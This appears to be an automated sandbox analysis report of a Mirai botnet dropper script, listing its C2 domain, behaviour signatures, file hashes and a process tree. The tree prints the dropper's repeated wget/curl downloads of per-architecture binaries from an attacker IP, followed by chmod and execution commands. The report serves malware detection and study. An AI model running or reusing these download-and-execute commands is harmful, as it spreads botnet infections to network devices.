Analysis

  • max time kernel
    131s
  • max time network
    150s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240729-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    19-12-2024 07:12

General

  • Target

    feelme420.sh

  • Size

    3KB

  • MD5

    22e9d65b991f00de3a52071664dc52f9

  • SHA1

    2b6dd972572c4c72ecf43bb7b66eebe776cd0360

  • SHA256

    7c31b6f7e29de978c261d41059788662d9d53faf08be61330e611eedcd46d33b

  • SHA512

    eefb50d98fc847673e4c38177789e26ee89ec7f027ec5ec92a842470638a84300f378cf10120afab26fe5a87de34c6616f33fc389be816b4763f0fea0eff18cb

Malware Config

Extracted

Family

mirai

C2

chernobyl.stressing.world

Extracted

Family

mirai

C2

chernobyl.stressing.world

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Mirai family
  • Contacts a large (15832) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 16 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 16 IoCs
  • Modifies Watchdog functionality 1 TTPs 20 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Enumerates active TCP sockets 1 TTPs 9 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Writes file to system bin folder 20 IoCs
  • Reads process memory 1 TTPs 34 IoCs

    Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.

  • Changes its process name 10 IoCs
  • Checks CPU configuration 1 TTPs 16 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads system network configuration 1 TTPs 9 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Reads runtime system information 57 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 31 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/feelme420.sh
    /tmp/feelme420.sh
    1⤵
    • Writes file to tmp directory
    PID:645
    • /usr/bin/wget
      wget http://94.23.167.188/F331M3/feelme420.x86
      2⤵
      • Writes file to tmp directory
      PID:648
    • /usr/bin/curl
      curl -O http://94.23.167.188/F331M3/feelme420.x86
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • Writes file to tmp directory
      PID:662
    • /bin/cat
      cat feelme420.x86
      2⤵
        PID:671
      • /bin/chmod
        chmod +x f331m3420 feelme420.sh feelme420.x86 systemd-private-5e13b6130fb642819963a0060f9a10ab-systemd-timedated.service-NLgOHv
        2⤵
        • File and Directory Permissions Modification
        PID:672
      • /tmp/f331m3420
        ./f331m3420 feelme420.exploit
        2⤵
        • Executes dropped EXE
        PID:674
      • /usr/bin/wget
        wget http://94.23.167.188/F331M3/feelme420.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:677
      • /usr/bin/curl
        curl -O http://94.23.167.188/F331M3/feelme420.mips
        2⤵
        • Checks CPU configuration
        • Reads runtime system information
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:680
      • /bin/cat
        cat feelme420.mips
        2⤵
        • System Network Configuration Discovery
        PID:681
      • /bin/chmod
        chmod +x f331m3420 feelme420.mips feelme420.sh feelme420.x86 systemd-private-5e13b6130fb642819963a0060f9a10ab-systemd-timedated.service-NLgOHv
        2⤵
        • File and Directory Permissions Modification
        PID:682
      • /tmp/f331m3420
        ./f331m3420 feelme420.exploit
        2⤵
        • Executes dropped EXE
        PID:683
      • /usr/bin/wget
        wget http://94.23.167.188/F331M3/feelme420.mpsl
        2⤵
        • Writes file to tmp directory
        PID:685
      • /usr/bin/curl
        curl -O http://94.23.167.188/F331M3/feelme420.mpsl
        2⤵
        • Checks CPU configuration
        • Reads runtime system information
        • Writes file to tmp directory
        PID:686
      • /bin/cat
        cat feelme420.mpsl
        2⤵
          PID:692
        • /bin/chmod
          chmod +x f331m3420 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 systemd-private-5e13b6130fb642819963a0060f9a10ab-systemd-timedated.service-NLgOHv
          2⤵
          • File and Directory Permissions Modification
          PID:693
        • /tmp/f331m3420
          ./f331m3420 feelme420.exploit
          2⤵
          • Executes dropped EXE
          PID:695
        • /usr/bin/wget
          wget http://94.23.167.188/F331M3/feelme420.arm
          2⤵
            PID:697
          • /usr/bin/curl
            curl -O http://94.23.167.188/F331M3/feelme420.arm
            2⤵
            • Checks CPU configuration
            • Reads runtime system information
            • Writes file to tmp directory
            PID:701
          • /bin/cat
            cat feelme420.arm
            2⤵
              PID:705
            • /bin/chmod
              chmod +x f331m3420 feelme420.arm feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 systemd-private-5e13b6130fb642819963a0060f9a10ab-systemd-timedated.service-NLgOHv
              2⤵
              • File and Directory Permissions Modification
              PID:707
            • /tmp/f331m3420
              ./f331m3420 feelme420.exploit
              2⤵
              • Executes dropped EXE
              PID:708
            • /usr/bin/wget
              wget http://94.23.167.188/F331M3/feelme420.arm5
              2⤵
              • Writes file to tmp directory
              PID:710
            • /usr/bin/curl
              curl -O http://94.23.167.188/F331M3/feelme420.arm5
              2⤵
              • Checks CPU configuration
              • Reads runtime system information
              • Writes file to tmp directory
              PID:715
            • /bin/cat
              cat feelme420.arm5
              2⤵
                PID:721
              • /bin/chmod
                chmod +x f331m3420 feelme420.arm feelme420.arm5 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 systemd-private-5e13b6130fb642819963a0060f9a10ab-systemd-timedated.service-NLgOHv
                2⤵
                • File and Directory Permissions Modification
                PID:722
              • /tmp/f331m3420
                ./f331m3420 feelme420.exploit
                2⤵
                • Executes dropped EXE
                PID:724
              • /usr/bin/wget
                wget http://94.23.167.188/F331M3/feelme420.arm6
                2⤵
                • Writes file to tmp directory
                PID:725
              • /usr/bin/curl
                curl -O http://94.23.167.188/F331M3/feelme420.arm6
                2⤵
                • Checks CPU configuration
                • Reads runtime system information
                • Writes file to tmp directory
                PID:731
              • /bin/cat
                cat feelme420.arm6
                2⤵
                  PID:741
                • /bin/chmod
                  chmod +x f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 systemd-private-5e13b6130fb642819963a0060f9a10ab-systemd-timedated.service-NLgOHv
                  2⤵
                  • File and Directory Permissions Modification
                  PID:742
                • /tmp/f331m3420
                  ./f331m3420 feelme420.exploit
                  2⤵
                  • Executes dropped EXE
                  PID:743
                • /usr/bin/wget
                  wget http://94.23.167.188/F331M3/feelme420.arm7
                  2⤵
                  • Writes file to tmp directory
                  PID:745
                • /usr/bin/curl
                  curl -O http://94.23.167.188/F331M3/feelme420.arm7
                  2⤵
                  • Checks CPU configuration
                  • Reads runtime system information
                  • Writes file to tmp directory
                  PID:751
                • /bin/cat
                  cat feelme420.arm7
                  2⤵
                    PID:755
                  • /bin/chmod
                    chmod +x f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 systemd-private-5e13b6130fb642819963a0060f9a10ab-systemd-timedated.service-NLgOHv
                    2⤵
                    • File and Directory Permissions Modification
                    PID:756
                  • /tmp/f331m3420
                    ./f331m3420 feelme420.exploit
                    2⤵
                    • Executes dropped EXE
                    • Modifies Watchdog functionality
                    • Writes file to system bin folder
                    • Changes its process name
                    PID:757
                  • /usr/bin/wget
                    wget http://94.23.167.188/F331M3/feelme420.ppc
                    2⤵
                    • Writes file to tmp directory
                    PID:760
                  • /usr/bin/curl
                    curl -O http://94.23.167.188/F331M3/feelme420.ppc
                    2⤵
                    • Checks CPU configuration
                    • Reads runtime system information
                    • Writes file to tmp directory
                    PID:764
                  • /bin/chmod
                    chmod +x f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.x86 systemd-private-5e13b6130fb642819963a0060f9a10ab-systemd-timedated.service-NLgOHv
                    2⤵
                    • File and Directory Permissions Modification
                    PID:766
                  • /tmp/f331m3420
                    ./f331m3420 feelme420.exploit
                    2⤵
                    • Executes dropped EXE
                    • Modifies Watchdog functionality
                    • Enumerates active TCP sockets
                    • Writes file to system bin folder
                    • Changes its process name
                    • Reads system network configuration
                    PID:767
                  • /usr/bin/wget
                    wget http://94.23.167.188/F331M3/feelme420.m68k
                    2⤵
                    • Writes file to tmp directory
                    PID:800
                  • /usr/bin/curl
                    curl -O http://94.23.167.188/F331M3/feelme420.m68k
                    2⤵
                    • Checks CPU configuration
                    • Reads runtime system information
                    • Writes file to tmp directory
                    PID:804
                  • /bin/chmod
                    chmod +x f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.x86 systemd-private-5e13b6130fb642819963a0060f9a10ab-systemd-timedated.service-NLgOHv
                    2⤵
                    • File and Directory Permissions Modification
                    PID:806
                  • /tmp/f331m3420
                    ./f331m3420 feelme420.exploit
                    2⤵
                    • Executes dropped EXE
                    • Modifies Watchdog functionality
                    • Enumerates active TCP sockets
                    • Writes file to system bin folder
                    • Changes its process name
                    • Reads system network configuration
                    PID:807
                  • /usr/bin/wget
                    wget http://94.23.167.188/F331M3/feelme420.sh4
                    2⤵
                    • Writes file to tmp directory
                    PID:810
                  • /usr/bin/curl
                    curl -O http://94.23.167.188/F331M3/feelme420.sh4
                    2⤵
                    • Checks CPU configuration
                    • Reads runtime system information
                    • Writes file to tmp directory
                    PID:814
                  • /bin/chmod
                    chmod +x f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.x86 systemd-private-5e13b6130fb642819963a0060f9a10ab-systemd-timedated.service-NLgOHv
                    2⤵
                    • File and Directory Permissions Modification
                    PID:816
                  • /tmp/f331m3420
                    ./f331m3420 feelme420.exploit
                    2⤵
                    • Executes dropped EXE
                    • Modifies Watchdog functionality
                    • Enumerates active TCP sockets
                    • Writes file to system bin folder
                    • Changes its process name
                    • Reads system network configuration
                    PID:817
                  • /usr/bin/wget
                    wget http://94.23.167.188/F331M3/feelme420.spc
                    2⤵
                    • Writes file to tmp directory
                    PID:822
                  • /usr/bin/curl
                    curl -O http://94.23.167.188/F331M3/feelme420.spc
                    2⤵
                    • Checks CPU configuration
                    • Reads runtime system information
                    • Writes file to tmp directory
                    PID:826
                  • /bin/chmod
                    chmod +x f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 systemd-private-5e13b6130fb642819963a0060f9a10ab-systemd-timedated.service-NLgOHv
                    2⤵
                    • File and Directory Permissions Modification
                    PID:828
                  • /tmp/f331m3420
                    ./f331m3420 feelme420.exploit
                    2⤵
                    • Executes dropped EXE
                    • Modifies Watchdog functionality
                    • Enumerates active TCP sockets
                    • Writes file to system bin folder
                    • Changes its process name
                    • Reads system network configuration
                    PID:829
                  • /usr/bin/wget
                    wget http://94.23.167.188/F331M3/feelme420.arc
                    2⤵
                    • Writes file to tmp directory
                    PID:838
                  • /usr/bin/curl
                    curl -O http://94.23.167.188/F331M3/feelme420.arc
                    2⤵
                    • Checks CPU configuration
                    • Reads runtime system information
                    • Writes file to tmp directory
                    PID:842
                  • /bin/chmod
                    chmod +x f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86
                    2⤵
                    • File and Directory Permissions Modification
                    PID:844
                  • /tmp/f331m3420
                    ./f331m3420 feelme420.exploit
                    2⤵
                    • Executes dropped EXE
                    • Modifies Watchdog functionality
                    • Enumerates active TCP sockets
                    • Writes file to system bin folder
                    • Changes its process name
                    • Reads system network configuration
                    PID:845
                  • /usr/bin/wget
                    wget http://94.23.167.188/F331M3/feelme420.x86_64
                    2⤵
                    • Writes file to tmp directory
                    PID:848
                  • /usr/bin/curl
                    curl -O http://94.23.167.188/F331M3/feelme420.x86_64
                    2⤵
                    • Checks CPU configuration
                    • Reads runtime system information
                    • Writes file to tmp directory
                    PID:852
                  • /bin/chmod
                    chmod +x f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_64
                    2⤵
                    • File and Directory Permissions Modification
                    PID:854
                  • /tmp/f331m3420
                    ./f331m3420 feelme420.exploit
                    2⤵
                    • Executes dropped EXE
                    • Modifies Watchdog functionality
                    • Enumerates active TCP sockets
                    • Writes file to system bin folder
                    • Changes its process name
                    • Reads system network configuration
                    PID:855
                  • /usr/bin/wget
                    wget http://94.23.167.188/F331M3/feelme420.i686
                    2⤵
                    • Writes file to tmp directory
                    PID:860
                  • /usr/bin/curl
                    curl -O http://94.23.167.188/F331M3/feelme420.i686
                    2⤵
                    • Checks CPU configuration
                    • Reads runtime system information
                    • Writes file to tmp directory
                    PID:864
                  • /bin/chmod
                    chmod +x f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.i686 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_64
                    2⤵
                    • File and Directory Permissions Modification
                    PID:866
                  • /tmp/f331m3420
                    ./f331m3420 feelme420.exploit
                    2⤵
                    • Executes dropped EXE
                    • Modifies Watchdog functionality
                    • Enumerates active TCP sockets
                    • Writes file to system bin folder
                    • Changes its process name
                    • Reads system network configuration
                    PID:867
                  • /usr/bin/wget
                    wget http://94.23.167.188/F331M3/feelme420.i486
                    2⤵
                    • Writes file to tmp directory
                    PID:870
                  • /usr/bin/curl
                    curl -O http://94.23.167.188/F331M3/feelme420.i486
                    2⤵
                    • Checks CPU configuration
                    • Reads runtime system information
                    • Writes file to tmp directory
                    PID:874
                  • /bin/chmod
                    chmod +x f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.i486 feelme420.i686 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_64
                    2⤵
                    • File and Directory Permissions Modification
                    PID:876
                  • /tmp/f331m3420
                    ./f331m3420 feelme420.exploit
                    2⤵
                    • Executes dropped EXE
                    • Modifies Watchdog functionality
                    • Enumerates active TCP sockets
                    • Writes file to system bin folder
                    • Changes its process name
                    • Reads system network configuration
                    PID:877
                  • /usr/bin/wget
                    wget http://94.23.167.188/F331M3/feelme420.i586
                    2⤵
                      PID:882
                    • /usr/bin/curl
                      curl -O http://94.23.167.188/F331M3/feelme420.i586
                      2⤵
                      • Checks CPU configuration
                      • Reads runtime system information
                      • Writes file to tmp directory
                      PID:886
                    • /bin/chmod
                      chmod +x f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.i486 feelme420.i586 feelme420.i686 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_64
                      2⤵
                      • File and Directory Permissions Modification
                      PID:888
                    • /tmp/f331m3420
                      ./f331m3420 feelme420.exploit
                      2⤵
                      • Executes dropped EXE
                      • Modifies Watchdog functionality
                      • Enumerates active TCP sockets
                      • Writes file to system bin folder
                      • Reads process memory
                      • Changes its process name
                      • Reads system network configuration
                      • Reads runtime system information
                      PID:889

                  Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • /tmp/f331m3420

                    Filesize

                    68KB

                    MD5

                    71b0c2e7cc122d6de4a481bea5ebc6d9

                    SHA1

                    f982ae244188ddd93b797e9548e049b97d2f2c7f

                    SHA256

                    de0eaed88adb239921c42f1f8038523d53c735f01992fe773f54e1d181750833

                    SHA512

                    f38ed5895d7c420b15688de521df6fc394ae9e1690a5f3628f22bd6489dab21ec8e9fa6dcfca40082d5099763d10b680bba3b43ef6f71016132958aa9a0d7f43

                  • /tmp/f331m3420

                    Filesize

                    114KB

                    MD5

                    e10ad3d97637588b2056db57a546fa7f

                    SHA1

                    138efa03e54a9f1eaed0e587ea259c182a1289d1

                    SHA256

                    1ea71a6d347541c7f892d7361fbda4b282fcf5d11aeb7297a8345ce88f78865a

                    SHA512

                    c6a9455aa701260796fa9f9b466dccf1166bb11cf3c0d9896f43ea9936f695ace78863f230362b884249bc3a110a3e1f4ad659ea5e9163261fb0bc1c349dd71a

                  • /tmp/f331m3420

                    Filesize

                    114KB

                    MD5

                    c5d1f6a6e591069acffcaeb19c405a02

                    SHA1

                    1265bbf1ff14c6b913ced2f63807aaa93137d87b

                    SHA256

                    6e4e8f08dd7471f62194314808a2d1a19b53db947c707a8839ce56c453656049

                    SHA512

                    64d63427c40954e8b6c56b2bf56533ed3b06bc347b7add89e15e59fa7ca62ae744ec398384487621b5ace6dd6a6fcb9fe71cdabbcd5ef7379441d9ec779ac5ae

                  • /tmp/f331m3420

                    Filesize

                    218B

                    MD5

                    9efd7ff37a85d83af5298b3671491070

                    SHA1

                    24c2fbed0abb244b610f6aa0a429c50902d7a682

                    SHA256

                    a90c0ae7235ef04a7df3797ab4f15c35e1d5f04fafbf06d81df3e6ce82e7a7b4

                    SHA512

                    20204386063b3ea13c5db7527c80c8f651b8b6b003c8282335e79f4ded81aabf8e36bed2d238c6da09360e9f94cec954993eb366b409a38b4720c376621c4cf8

                  • /tmp/f331m3420

                    Filesize

                    63KB

                    MD5

                    8e8b3e650b8b979fca40999c2aef8077

                    SHA1

                    af3f71ef4f46e03afc6c060ff3fdb858b98a54eb

                    SHA256

                    ec953f9e9a20a77753750cf458536542c6e1a6871ea73e2d4dfb74b7055898c4

                    SHA512

                    bb940245f77d7a2d886e71561f7d3a2beb3f6f0ada5a3a61718abe947be028a93a6eb21833e07d1710f4b425c0767184f5cd41890e81fefcd66e12273971151f

                  • /tmp/f331m3420

                    Filesize

                    146KB

                    MD5

                    1fd1ed52897289d90690ca1217e10df9

                    SHA1

                    6a2663a4295793e0bc544d6c554b554688761668

                    SHA256

                    15b6070e6e1ab9f89a2a55a64a5f6ca794129a75a38d1e88bda0c312254de6ce

                    SHA512

                    042e4348ae538c0afc9c420347de6cb9f59462c18f6f319e18e3a5861d243ed645d78208d2d384670c7ce34bcd23ad0f6fba5cc8e9f2290ebe847313363f1bf3